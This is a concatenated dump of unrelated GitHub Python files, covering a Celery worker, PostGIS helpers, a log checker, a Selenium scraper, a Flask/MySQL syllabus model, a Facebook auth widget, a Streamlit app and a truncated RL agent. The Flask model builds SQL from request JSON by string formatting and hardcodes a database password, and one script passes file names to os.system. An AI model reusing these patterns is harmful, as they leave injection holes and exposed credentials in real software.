template[\"immutable_data\"][\"perk_boost\"]\n template_skeleton.perk2 = template[\"immutable_data\"][\"perk2\"] if (\"perk2\" in template[\"immutable_data\"].keys()) else None\n template_skeleton.perk_boost2 = template[\"immutable_data\"][\"perk_boost2\"] if (\"perk_boost2\" in template[\"immutable_data\"].keys()) else None\n template_skeleton.conductor_level = template[\"immutable_data\"][\"conductor_level\"]\n\n if template[\"schema\"][\"schema_name\"] == \"railcar\":\n template_skeleton.size = template[\"immutable_data\"][\"size\"]\n template_skeleton.type = template[\"immutable_data\"][\"type\"]\n template_skeleton.capacity = template[\"immutable_data\"][\"capacity\"]\n template_skeleton.commodity_type = template[\"immutable_data\"][\"commodity_type\"]\n template_skeleton.commodity_type2 = template[\"immutable_data\"][\"commodity_type2\"] if (\"commodity_type2\" in template[\"immutable_data\"].keys()) else None\n\n if template[\"schema\"][\"schema_name\"] == \"commodity\":\n template_skeleton.volume = template[\"immutable_data\"][\"volume\"]\n template_skeleton.weight = template[\"immutable_data\"][\"weight\"]\n template_skeleton.type = template[\"immutable_data\"][\"type\"]\n \n if template[\"schema\"][\"schema_name\"] == \"station\":\n template_skeleton.desc = template[\"immutable_data\"][\"desc\"]\n\n return template_skeleton\n\n def create_new_asset(self,asset):\n \n asset_skeleton = Asset(\n asset_id=str(asset[\"asset_id\"]),\n template_id = int(asset[\"template\"][\"template_id\"]),\n )\n if asset[\"schema\"][\"schema_name\"] == \"station\":\n asset_skeleton.img = asset[\"immutable_data\"][\"img\"]\n asset_skeleton.region = asset[\"immutable_data\"][\"region\"]\n asset_skeleton.region_id = asset[\"immutable_data\"][\"region_id\"]\n\n return asset_skeleton\n \n\n@celery.task(base=SqlAlchemyTask)\ndef writer(to_write,mode) 
-> str:\n start=time.perf_counter()\n method = getattr(Builder(), f\"create_new_{mode}\")\n for item in to_write:\n new_item = method(item)\n if new_item:\n commit_or_rollback(new_item)\n \n return f\"{(time.perf_counter()-start)} for {len(to_write)} items. mode: {mode}\"\n ","repo_name":"automaqqt/toc-history-api","sub_path":"project/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":14235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36492810285","text":"import sqlalchemy as sqla\nimport pandas as pd\nimport geopandas as gpd\nimport os\n\ndef table_to_gdf(conn, schema, layer):\n \"\"\"_summary_\n\n Parameters\n ----------\n conn : _type_\n _description_\n schema : _type_\n _description_\n layer : _type_\n _description_\n \"\"\"\n gdf = gpd.GeoDataFrame.from_postgis(\"SELECT * FROM {0}.{1};\".format(\n schema, layer), conn, geom_col='geom', index_col='ogc_fid',\n coerce_float=True)\n return(gdf)\n\ndef md_dict(conn, schema, layer):\n \"\"\"_summary_\n\n Parameters\n ----------\n conn : _type_\n _description_\n schema : _type_\n _description_\n layer : _type_\n _description_\n \"\"\"\n md = pd.read_sql(\"SELECT * FROM public.qgis_layer_metadata WHERE \\\n f_table_name = '{0}' AND f_table_schema = '{1}';\".format(layer, schema),\n conn)\n return(md.to_dict('records')[0])\n\ndef table_to_geojson(conn, schema, layer, outdir='tmp'):\n \"\"\"Read a table layer and write out to a geojson file.\n\n Parameters\n ----------\n conn : _type_\n _description_\n schema : _type_\n _description_\n layer : _type_\n _description_\n outdir : str, optional\n _description_, by default 'tmp'\n \"\"\"\n gdf = table_to_gdf(conn, schema, layer)\n fname = os.path.join(outdir, layer + '.geojson')\n os.makedirs(os.path.dirname(fname), exist_ok=True)\n gdf.to_file(fname, driver='GeoJSON')\n return(fname)\n\n\ndef upsert_df_to_table(df, key, engine, tmp_table, dest_table,\n schema='public'):\n \"\"\"Update/insert ('upsert) a pandas dataframe into a PostgreSQL table\n\n Since the pandas `to_sql` method has no method to update/insert, this\n essentially creates a temporary table to hold the updated dataframe rows,\n deletes the matching rows (by key) in the destination table, and then\n appends the new/updated rows.\n \"\"\"\n # Make sure the updated dataframe has the 'key' column as index\n df = df.set_index(key)\n\n # Put the updated dataframe into a temporary PG table\n df.to_sql(tmp_table, engine, if_exists='replace', index=True, schema=schema)\n\n # Get the connection/transaction objects\n conn = engine.connect()\n trans = conn.begin()\n\n try:\n # Delete the rows in the destination table that we are going to \"upsert\"\n conn.execute(sqla.text(\"DELETE FROM {0}.{1} WHERE {2} IN (SELECT {2} FROM {0}.{3})\".format(\n schema, dest_table, key, tmp_table)))\n trans.commit()\n\n # Insert the changed rows\n df.to_sql(dest_table, engine, if_exists='append', index=True)\n except:\n trans.rollback()\n raise","repo_name":"jornada-im/jgeo-utils","sub_path":"jgeo_py/pgio.py","file_name":"pgio.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10762083257","text":"#!/usr/bin/env python\n\nimport sys, os, argparse\nfrom datetime import datetime\nfrom tqdm import tqdm\n\ndef info(*values):\n print(*values, file=sys.stderr)\n\ndef tail(name):\n with open(name, 'r') as f:\n lines = f.read().splitlines()\n last_line = lines[-1]\n return 
last_line\n\ndef has_train_finished(log_name):\n if not os.path.exists(log_name):\n # assume ckpt is copied from somewhere else\n return True\n else:\n last_line = tail(log_name)\n return last_line.startswith('Training finished on')\n\ndef main(args):\n for log_name in tqdm([l.strip() for l in args.logs]):\n if not has_train_finished(log_name):\n mtime = datetime.fromtimestamp(os.path.getmtime(log_name))\n print('==> {} (Last Updated: {})'.format(log_name, mtime))\n os.system('tail -n5 {}'.format(log_name))\n print()\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-l', '--logs', default=sys.stdin)\n\n args = parser.parse_args()\n info(args)\n\n main(args)","repo_name":"toshohirasawa/mmt-with-monolingual-data","sub_path":"scripts/ls-train-stat.py","file_name":"ls-train-stat.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2402924493","text":"import sqlite3\nimport time\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom pyquery import PyQuery as pq\nfrom config import *\n\nfrom urllib.parse import quote\n\n#采用Chrome headless 须安装Chrome浏览器和与之匹配的Chromedriver.exe,并设置环境变量\nfrom selenium.webdriver.chrome.options import Options\nglobal browser\n\nchrome_options = Options()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument('--disable-gpu')\nbrowser = webdriver.Chrome(chrome_options=chrome_options)\n\"\"\"\n#采用PhantomJS,但已慢慢开始被放弃\nSERVICE_ARGS = ['--load-images=false', '--disk-cache=true']\nbrowser = webdriver.PhantomJS(service_args=SERVICE_ARGS)\n\"\"\"\nwait = WebDriverWait(browser, 10)\nconn = sqlite3.connect('test.db')#用sqlite3 如果文件不存在,会自动在当前目录创建:\ncursor = conn.cursor()# 创建一个Cursor:\n\nbrowser.get('http://www.cdggzy.com')\ntime.sleep(1)\nxmlxnamelist = ['JSGC','ZFCG','LandTrade','AssetResource']\nxmlxurllist = []\nfor link in browser.find_elements_by_xpath(\"//*[@href]\"):\n for xmlx in xmlxnamelist:\n if (link.get_attribute('href')).find(xmlx)>0 and xmlxurllist.count(link.get_attribute('href'))==0:\n xmlxurllist.append(link.get_attribute('href'))\n else:\n pass\n#print(xmlxurllist)\n\"\"\"\n#获取项目类型的链接 方法一\nurlJSGC = browser.find_element_by_xpath(\"//*[@id='form1']/div[3]/div[2]/div[2]/div/div[1]/div[1]/a\").get_attribute('href')\nurlLand = browser.find_element_by_xpath(\"//*[@id='form1']/div[3]/div[2]/div[2]/div/div[1]/div[2]/a\").get_attribute('href')\nurlReso = browser.find_element_by_xpath(\"//*[@id='form1']/div[3]/div[2]/div[2]/div/div[1]/div[3]/a\").get_attribute('href')\nurlZFCG = browser.find_element_by_xpath(\"//*[@id='form1']/div[3]/div[2]/div[2]/div/div[1]/div[4]/a\").get_attribute('href')\n#赋予项目类型的链接\nurl = ['http://www.cdggzy.com/site/JSGC/List.aspx',\n 'http://www.cdggzy.com/site/Notice/ZFCG/NoticeList.aspx',\n 'http://www.cdggzy.com/site/LandTrade/LandList.aspx',\n 'http://www.cdggzy.com/site/AssetResource/DealNoticeList.aspx']\n\"\"\"\nurl = xmlxurllist #[urlJSGC,urlZFCG,urlLand,urlReso]\nxmlxlist = ['建','采','土','资']\nurltext = url[0]\nxmlx = xmlxlist[0]\nurl_database_text ='create table IF NOT EXISTS gonggaob (item varchar(20) ,quxian varchar(6),infotitle varchar(50),baoming varchar(10), publishtime varchar(20))'\n\n\"\"\" #读取表名\ncursor.execute(\"SELECT name FROM sqlite_master WHERE type='table';\") 
\ntablenames = (cursor.fetchall())\nprint(tablenames)\n\"\"\"\ntry:\n cursor.execute(url_database_text) # 执行一条SQL语句,创建user表:\n cursor.execute('delete from gonggaob where 1=1') # 清空表格\nexcept:\n\n print('Create table failed')\n pass\ndef index_page(page):\n\n try:\n for i in range(len(xmlxurllist)):#爬取项目类型range(2):\n urltext=url[i]\n #xmlx=xmlxlist[i]\n #print(xmlxlist[i])\n browser.get(urltext)\n browser.find_element_by_xpath(\"//div[@data-value='0']\").click() # 点击公告类型:全部公告\n browser.find_element_by_xpath(\"//div[@data-value='510112']\").click() # 点击交易地点:龙泉驿区\n time.sleep(5)\n\n pagestext = str(browser.find_element_by_xpath(\"//*[@id='LabelPage']\").text)\n #pagestext = doc.find('#LabelPage').text()\n pageslist = pagestext.split('/')[:]\n #currentpage = int(pageslist[0])\n totalpages = int(pageslist[1])\n #print(pageslist)\n if page == 1:\n get_products(page, i)\n elif page <= totalpages:\n browser.find_element_by_xpath(\"//*[@id='Pager']/a[\" + str(page + 1) + \"]\").click()\n time.sleep(5)\n #html = browser.page_source\n #doc = pq(html)\n #pagestext2 = str(browser.find_element_by_xpath(\"//*[@id='LabelPage']\").text)\n #pagestext2 = doc.find('#LabelPage').text()\n #pageslist2 = pagestext2.split('/')[:]\n #print(pageslist2)\n \"\"\"\n browser.find_element_by_xpath(\"//button[@id='preview']\").click() # 点击 上一页 \n browser.find_element_by_xpath(\"//button[@id='nextview']\").click() # 点击 下一页\n \"\"\"\n get_products(page, i)\n else:\n pass\n time.sleep(1)\n except TimeoutException:\n #index_page(page)\n pass\ndef get_products(page,i):\n time.sleep(1) # 必须缓冲一下才行\n html = browser.page_source\n doc = pq(html)\n print(xmlxlist[i]+':爬取第', page, '页 当前页:' + doc.find('#LabelPage').text())\n contentlist = doc('#contentlist .contentitem').items()\n content = doc('#contentlist').text()\n print(content)\n ins = \"insert into gonggaob values(?,?,?,?,?);\"\n rownum = 0\n for contentitem in contentlist:\n bm = contentitem.find('.item-right')\n bmtext = bm.text()\n if len(bmtext) == 10:\n bmtext = ''\n else:\n bmtext = bm.text()[-4:] # 截取倒数第四个字符到结尾\n product = {\n 'quxian': contentitem.find('.col-xs-1').text(),\n 'infotitle': contentitem.find('.infotitle').text(),\n 'baoming': bmtext,\n 'publishtime': contentitem.find('.publishtime').text()\n }\n # print(product)\n cursor.execute(ins, (\n xmlxlist[i], product['quxian'], product['infotitle'], product['baoming'], product['publishtime']))\n rownum = rownum + 1\n conn.commit()\n\n #except:\n # pass\ndef main():\n for i in range(3): #爬取页数1-3页\n index_page(i+1)\n cursor.close()\n\n conn.close() # 关闭Connection:\n browser.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"morewit/morewit","sub_path":"TaobaoProduct-master/spider_lqggzy.py","file_name":"spider_lqggzy.py","file_ext":"py","file_size_in_byte":6053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25817711979","text":"#from app import app\n#from app.controladores.controlador import tasks\nfrom flask import jsonify, request\nfrom flaskext.mysql import MySQL\n\nclass Model:\n\n def __init__(self,app):\n self.mysql=MySQL()\n app.config['MYSQL_DATABASE_USER']='root'\n app.config['MYSQL_DATABASE_PASSWORD']='unsa12345'\n app.config['MYSQL_DATABASE_DB']='Silabos'\n app.config['MYSQL_DATABASE_HOST']='127.0.0.1'\n self.mysql.init_app(app)\n\n self.con=self.mysql.connect()\n self.cursor=self.con.cursor()\n\n def getSilabos(self):\n silabos = []\n self.cursor.execute(\"SELECT * from Silabo\")\n tmp = self.cursor.fetchall()\n for silabo in 
tmp:\n s = {}\n s[\"id\"] = silabo[0]\n s[\"sem\"] = silabo[1]\n silabos.append(s)\n\n return jsonify(silabos)\n \n \n def addDocente(self):\n print(request.json)\n query = f'INSERT INTO Docente (doc_dni , doc_nom , doc_ape_pat , doc_ape_mat , doc_grad_aca , dep_aca_ide ) VALUES ({request.json[\"dni\"]},\"{request.json[\"name\"]}\",\"{request.json[\"lastname1\"]}\",\"{request.json[\"lastname2\"]}\",\"{request.json[\"gradoacademico\"]}\",{request.json[\"depAcademico\"]})'\n print (query)\n self.cursor.execute(query)\n self.con.commit()\n return \"Insert Succesful\"\n\n def searchDocente(self, dni):\n Docentes = []\n query = \"SELECT doc_ide ,doc_dni , doc_nom , doc_ape_pat , doc_ape_mat , doc_grad_aca , dep_aca_ide FROM Docente WHERE doc_dni = %s AND doc_del_date is null \"\n self.cursor.execute(query, (dni,))\n data = self.cursor.fetchall()\n \n for dnis in data:\n s = {}\n s[\"doc_ide\"] = dnis[0]\n s[\"doc_dni\"] = dnis[1]\n s[\"doc_nom\"] = dnis[2]\n s[\"doc_ape_mat\"] = dnis[3]\n s[\"doc_ape_pat\"] = dnis[4]\n s[\"doc_grad_aca\"] = dnis[5]\n s[\"dep_aca_ide\"] = dnis[6]\n \n Docentes.append(s)\n \n return jsonify(Docentes[0])\n\n\n def deleteDocente(self,dni):\n query = \"UPDATE Docente SET doc_del_date=now() WHERE doc_dni= %s\"\n self.cursor.execute(query, (dni,))\n self.con.commit()\n return \"Docente Eliminado\"\n\n def updateDocente(self ):\n newdata = request.json\n print (\"BODY JSON: \",newdata)\n t = newdata[\"doc_ide\"]\n #query = \"UPDATE Docente SET doc_dni = %s , doc_nom = %s, doc_ape_pat = %s, doc_ape_mat = %s, doc_grad_aca = %s, dep_aca_ide = %s WHERE doc_ide = %s \" , ( newdata[\"doc_dni\"],newdata[\"doc_nom\"] ,newdata[\"doc_ape_pat\"],newdata[\"doc_ape_mat\"],newdata[\"doc_grad_aca\"],newdata[\"dep_aca_ide\"],newdata[\"doc_ide\"] )\n query = \"UPDATE Docente SET doc_dni = %s , doc_nom = %s, doc_ape_pat = %s, doc_ape_mat = %s, doc_grad_aca = %s, dep_aca_ide = %s WHERE doc_ide = %s\" \n \n #print (query)\n\n self.cursor.execute(query,( newdata[\"doc_dni\"],newdata[\"doc_nom\"] ,newdata[\"doc_ape_pat\"],newdata[\"doc_ape_mat\"],newdata[\"doc_grad_aca\"],newdata[\"dep_aca_ide\"],newdata[\"doc_ide\"]))\n self.con.commit()\n return \"Docente Actualizado\"\n \n \n\n def searchCurs(self, cod):\n Cursos = []\n query = \"SELECT cur_cod , cur_nom , cur_sem , cur_dur , cur_hor_teo , cur_hor_prac , cur_hor_lab , cur_credi , cur_fund FROM Curso WHERE cur_cod = %s \"\n \n self.cursor.execute(query, (cod,))\n data = self.cursor.fetchall()\n\n for codi in data:\n s = {}\n s[\"cur_cod\"] = codi[0]\n s[\"cur_nom\"] = codi[1]\n s[\"cur_sem\"] = codi[2]\n s[\"cur_dur\"] = codi[3]\n s[\"cur_hor_teo\"] = codi[4]\n s[\"cur_hor_prac\"] = codi[5]\n s[\"cur_hor_lab\"] = codi[6]\n s[\"cur_credi\"] = codi[7]\n s[\"cur_fund\"] = codi[8]\n \n Cursos.append(s)\n\n return jsonify(Cursos[0])\n ","repo_name":"JoseCcari/TI2-Silabo","sub_path":"TI2-Silabo/app/modelos/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18538547945","text":"# 이진 검색 트리 G5\nimport sys\n\nsys.setrecursionlimit(10 ** 6)\ninput = sys.stdin.readline\narr = []\n# 입력이 없을때까지 반복하여 입력을 리스트에 추가한다.\nwhile True:\n try:\n arr.append(int(input()))\n except:\n break\n\n\ndef postorder(first, end):\n if first > end:\n return\n mid = end + 1 # 오른쪽 노드가 없을 경우(루트보다 큰 값이 없을 때)\n\n # 서브트리 탐색\n for i in range(first + 1, end + 1):\n if arr[first] < arr[i]: # 루트보다 큰 값이면 오른쪽 서브트리로\n mid = i # 왼쪽 서브트리, 오른쪽 서브트리로 나뉘는 부분을 
mid로 설정\n break\n\n postorder(first + 1, mid - 1) # 왼쪽 서브트리를 재귀적으로 탐색\n postorder(mid, end) # 오른쪽 서브트리를 재귀적으로 탐색\n print(arr[first])\n\n\npostorder(0, len(arr) - 1)\n","repo_name":"kkm0406/AlgorithmBOJ","sub_path":"트리/5639.py","file_name":"5639.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15880948909","text":"import gtk\nimport urllib\nimport webkit\nimport string\n\nfrom gtk import Builder\nimport gwibber.microblog\nfrom gwibber.microblog import facebook\nfrom gwibber.microblog.util import facelib\nfrom gwibber.microblog.util.const import *\n# Try to import * from custom, install custom.py to include packaging \n# customizations like distro API keys, etc\ntry:\n from gwibber.microblog.util.custom import *\nexcept:\n pass\n\nimport json, urlparse, gnomekeyring, uuid\nimport gettext\nfrom gettext import gettext as _\nif hasattr(gettext, 'bind_textdomain_codeset'):\n gettext.bind_textdomain_codeset('gwibber','UTF-8')\ngettext.textdomain('gwibber')\n\n\"\"\"\ngtk.gdk.threads_init()\n\nAPP_KEY = \"71b85c6d8cb5bbb9f1a3f8bbdcdd4b05\"\n\"\"\"\n\nclass AccountWidget(gtk.VBox):\n \"\"\"AccountWidget: A widget that provides a user interface for configuring facebook accounts in Gwibber\n \"\"\"\n \n def __init__(self, account=None, dialog=None):\n \"\"\"Creates the account pane for configuring facebook accounts\"\"\"\n gtk.VBox.__init__( self, False, 20 )\n self.ui = gtk.Builder()\n self.ui.set_translation_domain (\"gwibber\")\n self.ui.add_from_file (gwibber.resources.get_ui_asset(\"gwibber-accounts-facebook.ui\"))\n self.ui.connect_signals(self)\n self.vbox_settings = self.ui.get_object(\"vbox_settings\")\n self.pack_start(self.vbox_settings, False, False)\n self.show_all()\n if account:\n self.account = account\n else:\n self.account = {}\n self.dialog = dialog\n has_secret_key = True\n if self.account.has_key(\"id\"):\n try:\n value = gnomekeyring.find_items_sync(gnomekeyring.ITEM_GENERIC_SECRET, {\"id\": str(\"%s/%s\" % (self.account[\"id\"], \"secret_key\"))})[0].secret\n except gnomekeyring.NoMatchError:\n has_secret_key = False\n try:\n if self.account[\"session_key\"] and self.account[\"secret_key\"] and self.account[\"username\"] and has_secret_key:\n self.ui.get_object(\"hbox_facebook_auth\").hide()\n self.ui.get_object(\"fb_auth_done_label\").set_label(_(\"%s has been authorized by Facebook\") % str(self.account[\"username\"]))\n self.ui.get_object(\"hbox_facebook_auth_done\").show()\n else:\n self.ui.get_object(\"hbox_facebook_auth_done\").hide()\n self.ui.get_object(\"facebook_auth_button\").modify_bg(gtk.STATE_NORMAL, gtk.gdk.color_parse(\"red\"))\n if self.dialog:\n self.dialog.get_object('vbox_create').hide()\n except:\n self.ui.get_object(\"hbox_facebook_auth_done\").hide()\n if self.dialog:\n self.dialog.get_object(\"vbox_create\").hide()\n\n def on_facebook_auth_clicked(self, widget, data=None):\n (self.win_w, self.win_h) = self.window.get_size()\n\n web = webkit.WebView()\n web.get_settings().set_property(\"enable-plugins\", False)\n web.load_html_string(_(\"
<html><body>Please wait...</body></html>
\"), \"file:///\")\n\n url = urllib.urlencode({\n \"api_key\": FB_APP_KEY,\n \"connect_display\": \"popup\",\n \"v\": \"1.0\",\n \"next\": \"http://www.facebook.com/connect/login_success.html\",\n \"cancel_url\": \"http://www.facebook.com/connect/login_failure.html\",\n \"fbconnect\": \"true\",\n \"return_session\": \"true\",\n \"req_perms\": \"publish_stream,read_stream,status_update,offline_access,user_photos,friends_photos\",\n })\n web.set_size_request(450, 340)\n web.open(\"http://www.facebook.com/login.php?\" + url)\n web.connect(\"title-changed\", self.on_facebook_auth_title_change)\n\n scroll = gtk.ScrolledWindow()\n scroll.add(web)\n\n self.pack_start(scroll, True, True, 0)\n self.show_all()\n self.ui.get_object(\"vbox1\").hide()\n self.ui.get_object(\"expander1\").hide()\n\n def on_facebook_auth_title_change(self, web=None, title=None, data=None):\n if title.get_title() == \"Success\":\n try:\n url = web.get_main_frame().get_uri()\n data = json.loads(urlparse.parse_qs(url.split(\"?\", 1)[1])[\"session\"][0])\n self.account[\"session_key\"] = str(data[\"session_key\"])\n\n fbuid = self.account[\"session_key\"].split(\"-\")[1]\n fbc = facelib.Facebook(FB_APP_KEY, \"\")\n fbc.session_key = self.account[\"session_key\"]\n fbc.secret_key = str(data[\"secret\"])\n self.account[\"username\"] = str(fbc.users.getInfo(fbuid)[0][\"name\"])\n self.account[\"secret_key\"] = str(data[\"secret\"])\n \n if not self.account.has_key(\"username\"):\n self.account[\"username\"] = str(fbc.users.getInfo(fbuid)[0][\"uid\"])\n\n \"\"\"\n if \"_id\" not in self.account:\n valid = string.ascii_letters + string.digits + \"-\"\n aId = \"facebook-%s\" % self.account[\"username\"]\n self.account[\"_id\"] = \"\".join((x for x in aId if x in valid)).lower()\n \n self.account[\"secret_key\"] = \":KEYRING:%s\" % \\\n gnomekeyring.item_create_sync(\n gnomekeyring.get_default_keyring_sync(),\n gnomekeyring.ITEM_GENERIC_SECRET,\n \"Gwibber pref: %s/%s\" % (self.account[\"_id\"], \"secret_key\"),\n {\"id\": str(\"%s/%s\" % (self.account[\"_id\"], \"secret_key\"))},\n str(data[\"secret\"]), True)\n \"\"\"\n\n self.ui.get_object(\"hbox_facebook_auth\").hide()\n self.ui.get_object(\"fb_auth_done_label\").set_label(_(\"%s has been authorized by Facebook\") % str(self.account[\"username\"]))\n self.ui.get_object(\"hbox_facebook_auth_done\").show()\n if self.dialog and self.account.has_key(\"id\"):\n self.dialog.get_object(\"vbox_save\").show()\n elif self.dialog:\n self.dialog.get_object(\"vbox_create\").show()\n except:\n #FIXME: We should do this in the same window\n pass\n web.hide()\n self.window.resize(self.win_w, self.win_h)\n self.ui.get_object(\"vbox1\").show()\n self.ui.get_object(\"expander1\").show()\n\n if title.get_title() == \"Failure\":\n gtk.gdk.threads_enter()\n d = gtk.MessageDialog(None, gtk.DIALOG_MODAL, gtk.MESSAGE_ERROR,\n gtk.BUTTONS_OK, _(\"Facebook authorization failed. 
Please try again.\"))\n if d.run(): d.destroy()\n gtk.gdk.threads_leave()\n\n web.hide()\n self.window.resize(self.win_w, self.win_h)\n","repo_name":"SMIDEC/gwibber-lc","sub_path":"gwibber-2.32.2/gwibber/lib/gtk/facebook.py","file_name":"facebook.py","file_ext":"py","file_size_in_byte":6055,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"1688465785","text":"def solution(clothes):\n\n from collections import Counter\n\n dict_cloth = Counter([kind for _, kind in clothes])\n print(dict_cloth.values())\n from functools import reduce\n\n answer = reduce(lambda pre, now: pre * (now + 1), dict_cloth.values(), 1) - 1\n\n return answer\n\n\ndef solution_2(clothes):\n\n from collections import defaultdict\n\n dict_cloth = defaultdict(int)\n for _, kind in clothes:\n dict_cloth[kind] += 1\n\n answer = 1\n for kind in dict_cloth:\n answer *= dict_cloth[kind] + 1\n # 하루에 최소 한 개의 의상은 입어야 하므로, 아무것도 입지 않는 경우를 제외\n answer -= 1\n\n return answer\n\n\ndef solution_1(clothes):\n answer = 0\n\n dict_hash = {}\n for cloth, kind in clothes:\n dict_hash[kind] = dict_hash.get(kind, 0) + 1\n\n answer += 1\n for type in dict_hash:\n answer *= dict_hash[type] + 1\n answer -= 1\n\n return answer\n\n\nif __name__ == '__main__':\n in_c = [[\"crowmask\", \"face\"], [\"bluesunglasses\", \"face\"], [\"smoky_makeup\", \"face\"]]\n\n print(solution(in_c))\n","repo_name":"junho-devv/algorithm-study","sub_path":"PROGRAMMERSㅣ프로그래머스/고득점 KIT/해시/위장.py","file_name":"위장.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31191915206","text":"import streamlit as st\nfrom pandasai.llm.openai import OpenAI\nfrom dotenv import load_dotenv\nimport os\nimport pandas as pd\nfrom pandasai import PandasAI\n\nload_dotenv()\n\nopenai_api_key = os.getenv(\"OPENAI_API_KEY\")\nos.environ[\"OPENAI_API_KEY\"] = \"\"\n\ndef chat_with_csv(df,prompt):\n llm = OpenAI(api_token=openai_api_key)\n pandas_ai = PandasAI(llm)\n result = pandas_ai.run(df,prompt=prompt,show_code=True,is_conversational_answer=True)\n return result\n\nst.set_page_config(layout='wide')\nst.title(\"Multiple-CSV ChatApp powered by LLM\")\n\n# Upload multiple CSV files\ninput_csvs = st.file_uploader(\"Upload your CSV files\", type=['csv'], accept_multiple_files=True)\n\nif input_csvs:\n # Select a CSV file from the uploaded files using a dropdown menu\n selected_file = st.selectbox(\"Select a CSV file\", [file.name for file in input_csvs])\n selected_index = [file.name for file in input_csvs].index(selected_file)\n\n #load and display the selected csv file \n st.info(\"CSV uploaded successfully\")\n data = pd.read_csv(input_csvs[selected_index])\n st.dataframe(data,use_container_width=True)\n\n #Enter the query for analysis\n st.info(\"Chat Below\")\n input_text = st.text_area(\"Enter the query\")\n\n #Perform analysis\n if input_text:\n if st.button(\"Chat with csv\"):\n st.info(\"Your Query: \"+ input_text)\n result = chat_with_csv(data,input_text)\n st.success(result)\n\n\n\n\n \n","repo_name":"InsightEdge01/MutiChatCSVPandasAI","sub_path":"appp.py","file_name":"appp.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"36275993691","text":"import cv2\nimport sys\nimport numpy as np\n\n# File utils\n\nclass ReadImage:\n def __init__(self, mode=0, rgb=True):\n '''\n Read img\n mode: int. 
0 - COLOR, 1 - GRAYSCALE, 2 - WITH ALPHA CHANNEL\n        rgb: bool. Invert RB channels\n        '''\n        self.mode = mode\n        self.rgb = rgb\n\n    def __call__(self, img_path):\n        '''\n        Read img\n        img_path: string. Path to the file\n        '''\n        m = cv2.IMREAD_COLOR\n        if self.mode == 1:\n            m = cv2.IMREAD_GRAYSCALE\n        elif self.mode == 2:\n            m = cv2.IMREAD_UNCHANGED\n\n        img = cv2.imread(img_path, m)\n\n        if self.rgb:\n            img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n        return img\n\nclass OpenCVStream:\n\n    def __init__(self, source=0):\n        # Open a video file or an image file or a camera stream\n        self.cap = cv2.VideoCapture(source)\n\n    def get_color_frame(self):\n        hasFrame, frame = self.cap.read()\n        if not hasFrame:\n            raise RuntimeError('No frames available.')\n\n        return frame\n\n    def stop(self):\n        # cv2.VideoCapture is freed with release(); it has no close() method\n        self.cap.release()","repo_name":"robertanto/Open-Set-One-Shot-Face-Recognition","sub_path":"face_recognition/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"7838064018","text":"# import template\nimport tensorflow as tf\nimport numpy as np\n\nclass Agent:\n    def __init__(self, state_size, num_action, reward_discount, learning_rate, exploration_strategy):\n        self.state_size = state_size\n        self.num_action = num_action\n        self.reward_discount = reward_discount\n        self.exploration_strategy = exploration_strategy\n        self.iter = 0\n        self.data_type = tf.float32\n        self.optimizer = tf.keras.optimizers.Adam(learning_rate = learning_rate)\n        self.avg_loss = tf.keras.metrics.Mean(name = 'loss')\n        self.model = self.build_model('model')\n        self.is_shutdown_explore = False\n\n        self.buffer = []\n        self.reset_buffer()\n\n    def build_model(self, name):\n        nn_input = tf.keras.Input(shape = self.state_size, dtype = self.data_type)\n\n        x = tf.keras.layers.Dense(units = 128)(nn_input)\n        x = tf.keras.layers.ReLU()(x)\n        x = tf.keras.layers.Dense(units = 128)(x)\n        x = tf.keras.layers.ReLU()(x)\n        x = tf.keras.layers.Dense(units = self.num_action)(x)\n        nn_output = tf.keras.activations.softmax(x)\n\n        model = tf.keras.Model(name = name, inputs = nn_input, outputs = nn_output)\n\n        return model\n\n    def predict(self, state):\n        return self.model(tf.convert_to_tensor(state, self.data_type))\n\n    def loss(self, states, actions, rewards, state_primes):\n        # Calculate accumulated reward with discount\n        np_rewards = np.array(rewards)\n        num_reward = np_rewards.shape[0]\n        discounts = np.logspace(1, num_reward, base = self.reward_discount, num = num_reward)\n        gt = np.zeros(num_reward)\n        for i in range(num_reward):\n            gt[i] = np.sum(np.multiply(np_rewards[i:], discounts[:num_reward - i]))\n\n        # Normalize the rewards\n        gt = (gt - tf.math.reduce_mean(gt)) / (tf.math.reduce_std(gt) + 1e-9)\n\n        predicts = self.predict(states)\n\n        # indice = tf.stack([tf.range(len(actions)), actions], axis = 1)\n        # predict_probs = tf.gather_nd(predicts, indice)\n        # predict_log_probs = tf.math.log(predict_probs)\n\n        # log_prob = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=predicts, labels=actions)\n        log_prob = tf.reduce_sum(tf.math.log(predicts) * tf.one_hot(actions, self.num_action), axis = 1)\n\n        # Compute loss as formula: loss = Sum over a trajectory(-gamma * log(Pr(s, a| Theta)) * Gt)\n        # Update model with a trajectory every time.\n        return tf.reduce_sum(-log_prob * gt)\n\n    def get_metrics_loss(self):\n        return 